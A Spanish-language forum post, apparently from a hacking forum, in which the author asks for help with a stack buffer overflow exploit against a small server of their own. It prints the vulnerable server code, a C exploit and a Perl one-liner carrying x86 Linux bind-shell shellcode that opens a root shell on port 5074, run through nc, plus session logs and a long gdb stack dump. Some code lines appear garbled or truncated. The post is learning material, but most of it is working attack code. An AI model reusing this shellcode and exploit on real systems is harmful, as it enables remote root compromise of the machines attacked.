Bueno, puede que el título no sea muy elegante, pero es lo que se me ha ocurrido. Os explico:
Tengo una aplicación (Code 1) que estoy explotando. Ahora, he conseguido explotarla desde un comando en la consola. Y os escribo esto a causa del exploit que estoy haciendo y que no funciona ni grabándolo en un CD y oyéndolo al revés...
La cosa es que la shellcode se me "duplica" modificando el ret...
Os dejo algunos códigos, a ver si me podéis echar una manita...
__________________________________________________________________________________________
Exploit in action [Capt 0.1]juanra@Juanra:~/Escritorio/Serv$ ./exploit 127.0.0.1 31337
Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net
Creating socket... [OK]
Conecting target... [OK]
Creating buffer... [OK]
Sending buffer... [OK]
Now you can exec NC [nc -vv localhost 5074]
Be good!
juanra@Juanra:~/Escritorio/Serv$
__________________________________________________________________________________________
Serv in action [Capt 0.2]juanra@Juanra:~/Escritorio/Serv$ sudo gdb -q serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/Escritorio/Serv/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 03/03/2011 20:59:09
03/03/2011 20:59:09 Starting up...
03/03/2011 20:59:11 Got connection from 127.0.0.1:60359
03/03/2011 20:59:11 RECV 427 bytes: ������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
__________________________________________________________________________________________
Serv.c [Code 1]#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <time.h>
int sockfd, newsock;
void shutup (int signal)
{
times ();
printf ("Shutting down...\n\n"); close (newsock);
close (sockfd);
}
int times ()
{
struct tm *ahora;
char buffer [40];
strftime (buffer
, 40, "%d/%m/%Y %H:%M:%S" , ahora
); return 0;
}
int handle_connect (char *buffer)
{
char buff [256];
times ();
}
int main (int argc, char *argv [])
{
struct tm *ahora;
char hora [40];
strftime (hora
, 40, "%d/%m/%Y %H:%M:%S" , ahora
); printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora
);
if (getuid()!=0)
{
printf ("This proccess must be run by root.\n\n"); return 1;
}
if (argc<2)
{
printf ("Use: %s <PORT>\n\n", argv
[0]); return 1;
}
int cont;
struct sockaddr_in client, host;
char buffer [1024];
int size=sizeof (client);
sockfd=socket (2, 1 , 0);
host.sin_family=AF_INET;
host.
sin_port=htons
(atoi (argv
[1])); host.sin_addr.s_addr=0;
bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
listen (sockfd, 3);
times ();
printf ("Starting up...\n\n");
signal (SIGTERM, shutup);
signal (SIGINT, shutup);
while (1)
{
newsock=accept (sockfd, (struct sockaddr*)&client, &size);
times ();
printf ("Got connection from %s:%d\n", inet_ntoa
(client.
sin_addr), ntohs
(client.
sin_port));
cont=recv (newsock, &buffer, 1024, 0);
while (cont>1)
{
handle_connect (buffer);
cont=recv (newsock, &buffer, 1024, 0);
}
times ();
printf ("Finishing connection from %s:%d\n\n", inet_ntoa
(client.
sin_addr), ntohs
(client.
sin_port)); close (newsock);
}
close (sockfd);
return 0;
}
__________________________________________________________________________________________
Exploit.c [Code 2]#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
int main (int argc, char *argv [])
{
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n"); if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv
[0]); return 1;
}
printf ("Creating socket...\t"); struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.
sin_port = htons
(atoi (argv
[2])); host.sin_addr.s_addr = inet_addr (argv [1]);
if ((sockfd=socket (2, 1, 0))==-1)
{
return 1;
}
printf ("Conecting target...\t"); if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
return 1;
}
printf ("Creating buffer...\t"); char nops [168];
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52"
"\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43"
"\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80";
char ret [6] = "AAAA\x90";
char command [265];
printf ("Sending buffer...\t"); if (send
(sockfd
, &command
, strlen (command
), 0)==-1) {
return 1;
}
printf ("Now you can exec NC [nc -vv localhost 5074]\nBe good!\n\n"); return 0;
}
__________________________________________________________________________________________
Exploit Perl [Capt 1]juanra@Juanra:~/Escritorio/Serv$ perl -e 'print "\x90"x168 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x50\f8\xff\xbf" . "\x90"' | nc -vv localhost 31337
+++++++++++++++++++++++++++++++++++++++++++
juanra@Juanra:~/Escritorio/Serv$ nc -vv localhost 5074 [Conectarme como root :P]
__________________________________________________________________________________________
GDB look at ESP [Capt 2](gdb) x/5000x $esp
0xbffff800: 0x4050c389 0xb0e18950 0x3180cd66 0x686652d2
0xbffff810: 0x6643d213 0x6ae18953 0x89505110 0xcd66b0e1
0xbffff820: 0x44894080 0x43430424 0x80cd66b0 0x520cc483
0xbffff830: 0x66b04352 0x899380cd 0xcd3fb0d1 0xf9804180
0xbffff840: 0x52f67503 0x732f6e68 0x2f2f6868 0xe3896962
0xbffff850: 0xe1895352 0x80cd0bb0 0x41414141 0xb7ff6e90
0xbffff860: 0xb7fed1f8 0xb7fff2a0 0xbffffa0c 0xb7ff1413
0xbffff870: 0xb7e80428 0xb7fe25a2 0xb7ff7990 0xb7ff79b0
0xbffff880: 0xb7ffb028 0xb7ffbb31 0xb7ffbb31 0xb7ff7990
0xbffff890: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7fff2a0
0xbffff8a0: 0x00ffeff4 0x90909000 0x90909090 0x90909090
0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d0: 0x90909090 0x4050c031 0x4050c389 0xb0e18950
0xbffff8e0: 0x3180cd66 0x686652d2 0x6643d213 0x6ae18953
0xbffff8f0: 0x89505110 0xcd66b0e1 0x44894080 0x43430424
0xbffff900: 0x80cd66b0 0x520cc483 0x66b04352 0x899380cd
0xbffff910: 0xcd3fb0d1 0xf9804180 0x52f67503 0x732f6e68
0xbffff920: 0x2f2f6868 0xe3896962 0xe1895352 0x80cd0bb0
0xbffff930: 0x4050c031 0x4050c389 0xb0e18950 0x3180cd66
0xbffff940: 0x686652d2 0x6643d213 0x6ae18953 0x89505110
0xbffff950: 0xcd66b0e1 0x44894080 0x43430424 0x80cd66b0
0xbffff960: 0x520cc483 0x66b04352 0x899380cd 0xcd3fb0d1
---Type <return> to continue, or q <return> to quit---
0xbffff970: 0xf9804180 0x52f67503 0x732f6e68 0x2f2f6868
0xbffff980: 0xe3896962 0xe1895352 0x80cd0bb0 0x41414141
0xbffff990: 0xb7ff6e90 0xb7fed1f8 0xb7fff2a0 0xbffffa0c
0xbffff9a0: 0xb7ff1413 0xb7e80428 0xb7fe25a2 0xb7ff7990
0xbffff9b0: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7ffbb31
0xbffff9c0: 0xb7ff7990 0xb7ff79b0 0xb7ffb028 0xb7ffbb31
0xbffff9d0: 0xb7fff2a0 0xb7ffeff4 0xb7fe2000 0x00000007
0xbffff9e0: 0xb7fe2450 0x00000000 0x00000008 0x00000070
0xbffff9f0: 0xb7edf620 0x00000001 0xb7fe0d60 0x0804a054
0xbffffa00: 0xb7ffeff4 0x0000000c 0x00000007 0xbffffa94
0xbffffa10: 0xb7ff19ae 0x00000007 0x00000010 0x00000001
0xbffffa20: 0xb7fe25ce 0x00000000 0xb7fe2778 0xb7fe22f0
0xbffffa30: 0xb7fe0d40 0xb7fff014 0x00000002 0xb7fff2a0
0xbffffa40: 0xb7ff6e01 0x00000000 0xb7fe2290 0xb7fe2450
0xbffffa50: 0x00000000 0xb7ffef98 0x00000006 0xb7fe25ce
0xbffffa60: 0xb7fe2290 0x00000000 0x00000000 0xb7ff6f35
0xbffffa70: 0x00000008 0x00000088 0xb7ffeff4 0xbffffa94
0xbffffa80: 0xb7ff701e 0x00000088 0xbffffacc 0xbffffae8
0xbffffa90: 0x00000000 0xbffffabc 0xb7ff3209 0x00000011
0xbffffaa0: 0x00000008 0xb7e6d6c0 0x00000038 0x00000001
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000208 0xb7fe26d0 0x000000a8
0xbffffad0: 0x00000000 0x00000000 0x00000000 0xb7fe0dcc
---Type <return> to continue, or q <return> to quit---
0xbffffae0: 0xb7fea3b2 0xb7fd1000 0x0000df31 0xb7ffeff4
0xbffffaf0: 0xbffffcb0 0xb7fe536d 0xb7e7a400 0x0d696910
0xbffffb00: 0xbffffb38 0xb7feabe8 0xb7e8041e 0x0804848d
0xbffffb10: 0x00000000 0xb7fff948 0xb7fe0b40 0xbfff0002
0xbffffb20: 0xb7ff0ca8 0x080483dc 0xb7fff954 0xb7ffeff4
0xbffffb30: 0xb7fe0b14 0x00000001 0xbffffbb4 0xb7feafdd
0xbffffb40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb50: 0x00000000 0xb7ffae88 0xbffffb80 0x00000000
0xbffffb60: 0xf63d4e2e 0xb7fe0858 0x07b1ea71 0x00000003
0xbffffb70: 0xb7e71d10 0xb7e71b08 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x00000000 0x00000001 0x0000086f
0xbffffb90: 0xb7fe0b40 0xb7fe0858 0x08048475 0xb7e7ac20
0xbffffba0: 0x080482ac 0x00000001 0xb7ffeff4 0xf63d4e2e
0xbffffbb0: 0xb7fff828 0xbffffca0 0xb7feb1ef 0xbffffc90
0xbffffbc0: 0x080482ac 0xbffffc84 0xb7fff7cc 0x00000000
0xbffffbd0: 0xb7fe0b40 0x00000001 0x00000000 0x00000001
0xbffffbe0: 0xb7fff658 0x00000000 0x00010000 0x00000000
0xbffffbf0: 0xb7fe1168 0x00000000 0xbffffc90 0xbffffc84
0xbffffc00: 0x00000000 0x00000000 0x00000000 0xbffffcd0
0xbffffc10: 0xb7fff670 0x08048475 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0xb7fe3000 0x697a0002
0xbffffc30: 0x00000000 0x00000000 0x00000000 0xb2b70002
0xbffffc40: 0x0100007f 0x00000000 0x00000000 0x302f3330
---Type <return> to continue, or q <return> to quit---
0xbffffc50: 0x30322f33 0x32203131 0x31333a30 0x0030333a
0xbffffc60: 0xb7f8f329 0x08049ff4 0xbffffc78 0x080485d0
0xbffffc70: 0xb7fccff4 0x4d6fec92 0xb7fd0360 0x00000165
0xbffffc80: 0xbffffca0 0xb7fccff4 0xbffffcf8 0xb7e84775
0xbffffc90: 0x08048bd0 0x08048750 0xbffffcf8 0xb7e84775
0xbffffca0: 0x00000002 0xbffffd24 0xbffffd30 0xb7fe0b40
0xbffffcb0: 0x00000001 0x00000001 0x00000000 0x08048475
0xbffffcc0: 0xb7fccff4 0x08048bd0 0x08048750 0xbffffcf8
0xbffffcd0: 0xb5bf4009 0x9ac87419 0x00000000 0x00000000
0xbffffce0: 0x00000000 0xb7ff57f0 0xb7e8469d 0xb7ffeff4
0xbffffcf0: 0x00000002 0x08048750 0x00000000 0x08048771
0xbffffd00: 0x08048908 0x00000002 0xbffffd24 0x08048bd0
0xbffffd10: 0x08048bc0 0xb7ff07b0 0xbffffd1c 0xb7ffbd83
0xbffffd20: 0x00000002 0xbffffe28 0xbffffe4a 0x00000000
0xbffffd30: 0xbffffe50 0xbffffe60 0xbffffe6b 0xbffffe75
0xbffffd40: 0xbffffe86 0xbffffe94 0xbffffea2 0xbffffead
0xbffffd50: 0xbffffefe 0xbfffff1f 0xbfffff30 0xbfffff39
0xbffffd60: 0xbfffff41 0xbfffff63 0xbfffff75 0xbfffff82
0xbffffd70: 0xbfffff90 0xbfffff9d 0xbfffffb6 0x00000000
0xbffffd80: 0x00000020 0xb7fe1420 0x00000021 0xb7fe1000
0xbffffd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbffffda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbffffdb0: 0x00000004 0x00000020 0x00000005 0x00000008
---Type <return> to continue, or q <return> to quit---
0xbffffdc0: 0x00000007 0xb7fe2000 0x00000008 0x00000000
0xbffffdd0: 0x00000009 0x08048750 0x0000000b 0x00000000
0xbffffde0: 0x0000000c 0x00000000 0x0000000d 0x00000000
0xbffffdf0: 0x0000000e 0x00000000 0x00000017 0x00000000
0xbffffe00: 0x0000001f 0xbfffffda 0x0000000f 0xbffffe1b
0xbffffe10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffe20: 0x00000000 0x00000000 0x6d6f682f 0x756a2f65
0xbffffe30: 0x61726e61 0x6373452f 0x6f746972 0x2f6f6972
0xbffffe40: 0x76726553 0x7265732f 0x31330076 0x00373333
0xbffffe50: 0x4c454853 0x622f3d4c 0x622f6e69 0x00687361
0xbffffe60: 0x4d524554 0x6574783d 0x55006d72 0x3d524553
0xbffffe70: 0x746f6f72 0x44555300 0x53555f4f 0x6a3d5245
0xbffffe80: 0x726e6175 0x55530061 0x555f4f44 0x313d4449
0xbffffe90: 0x00303030 0x52455355 0x454d414e 0x6f6f723d
0xbffffea0: 0x4f430074 0x4e4d554c 0x30383d53 0x54415000
0xbffffeb0: 0x752f3d48 0x6c2f7273 0x6c61636f 0x6962732f
0xbffffec0: 0x752f3a6e 0x6c2f7273 0x6c61636f 0x6e69622f
0xbffffed0: 0x73752f3a 0x62732f72 0x2f3a6e69 0x2f727375
0xbffffee0: 0x3a6e6962 0x6962732f 0x622f3a6e 0x2f3a6e69
0xbffffef0: 0x2f727375 0x52313158 0x69622f36 0x5750006e
0xbfffff00: 0x682f3d44 0x2f656d6f 0x6e61756a 0x452f6172
0xbfffff10: 0x69726373 0x69726f74 0x65532f6f 0x4c007672
0xbfffff20: 0x3d474e41 0x455f7365 0x54552e53 0x00382d46
---Type <return> to continue, or q <return> to quit---
0xbfffff30: 0x454e494c 0x34323d53 0x4c485300 0x303d4c56
0xbfffff40: 0x44555300 0x4f435f4f 0x4e414d4d 0x752f3d44
0xbfffff50: 0x622f7273 0x672f6e69 0x2d206264 0x65732071
0xbfffff60: 0x48007672 0x3d454d4f 0x6d6f682f 0x756a2f65
0xbfffff70: 0x61726e61 0x474f4c00 0x454d414e 0x6f6f723d
0xbfffff80: 0x55530074 0x475f4f44 0x313d4449 0x00303030
0xbfffff90: 0x50534944 0x3d59414c 0x302e303a 0x4c4f4300
0xbfffffa0: 0x4554524f 0x673d4d52 0x656d6f6e 0x7265742d
0xbfffffb0: 0x616e696d 0x4158006c 0x4f485455 0x59544952
0xbfffffc0: 0x6f682f3d 0x6a2f656d 0x726e6175 0x582e2f61
0xbfffffd0: 0x68747561 0x7469726f 0x682f0079 0x2f656d6f
0xbfffffe0: 0x6e61756a 0x452f6172 0x69726373 0x69726f74
0xbffffff0: 0x65532f6f 0x732f7672 0x00767265 0x00000000
Un saludo a todos y muchas gracias...